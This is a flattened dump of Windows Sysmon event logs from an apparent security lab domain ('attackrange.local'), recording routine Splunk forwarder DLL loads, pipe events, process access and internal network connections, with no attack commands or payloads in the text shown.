SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001605866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x80000000000000001605862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x80000000000000001605857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.105{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:33.090{21761711-7A4D-6080-C060-00000000BB01}7316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:33.090{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x80000000000000001094924Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:33.471{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094923Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:33.471{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605967Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.858{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.858{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83C540EC4CAC4C901429024927097D3,SHA256=CF37DD3FDD6C3437228F29B86B11FBFE65BD8652CA939378DDA26D8BF0E5191Efalsefalse - insufficient disk space 23542300x80000000000000001094928Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:34.678{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B756710243794AD52FD45A96F3EADE0F,SHA256=20289EC037D93E44CF6DE3E5F48F9389699B55D46F8D006178A56AA7CF94CFB7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001605965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.685{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49720-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001605964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.092{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:34.092{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACE9D394B4C8527BEF516651DE12E7F6,SHA256=3031D3DA31185005BB2F4EEF8E1B7D228032922A8EB4A44808CFAF46A6002974falsefalse - insufficient disk space 10341000x80000000000000001094927Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:34.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094926Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:34.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605969Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:35.861{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605968Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:35.861{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB813F6C19C3767ABA7C477C1EAB0470,SHA256=A4EA8A364BFA4C513C5EEE88C12664387F7D751ABAF83DFF3203F61607359A3Dfalsefalse - insufficient disk space 23542300x80000000000000001094933Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.686{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B3B73C3A9AF9BCB37AAD2825CBB2341,SHA256=F25DF7938EF152131C8FD027D680AE5F1DA4BEEC7F80E88443568736652CEC35,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001094932Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:30.706{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1137-false10.0.1.12-8000- 10341000x80000000000000001094931Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094930Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.472{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094929Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:35.122{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5B1A25712B9678FAE93F4C54A5F5B8B,SHA256=6C6B18A257C75FE485341FC795A6BDCF5A88CC31E5652715223468047F5FEB9A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605971Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:36.868{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605970Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:36.868{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EF9DAEA26B1BE33BB833499D86E65D6,SHA256=856288DEC29374BA7D2C1A128D346D14D32F9829032D44298FB40FFA9A1916F3falsefalse - insufficient disk space 23542300x80000000000000001094936Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:36.690{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F67505D06BDFE6A0033046F1D81A87,SHA256=58050955FD8963CCEEB5C781EFC44C0049C863D2131D5D419C73FE7EDAD03FC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001094935Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:36.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094934Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:36.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605973Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:37.870{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605972Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:37.870{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F692B3F0957BD14AE8E89F9AAC853201,SHA256=59BABD3ECDD5C20B9ACBE5BFDCF04EFA10FBA6BAC325CB5830AE221193C8B1F9falsefalse - insufficient disk space 23542300x80000000000000001094939Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:37.693{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47C80FB30ED882C2E31710F0894E5807,SHA256=58AEC1DFA9B01C738253E364EB095CF8D9946F919D3D3D47A32DAAFBEEC8062F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001094938Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:37.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094937Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:37.473{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001605975Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:38.888{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605974Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:38.888{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7358BC6087B7E117B660235113CB1700,SHA256=296DA985FB3BC98C75E883B208CEEEEA7F672441AA75AF2EFBF9BB3D6A6B1E2Bfalsefalse - insufficient disk space 23542300x80000000000000001094942Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:38.705{761B69BB-820D-607D-D800-00000000BA01}1064NT 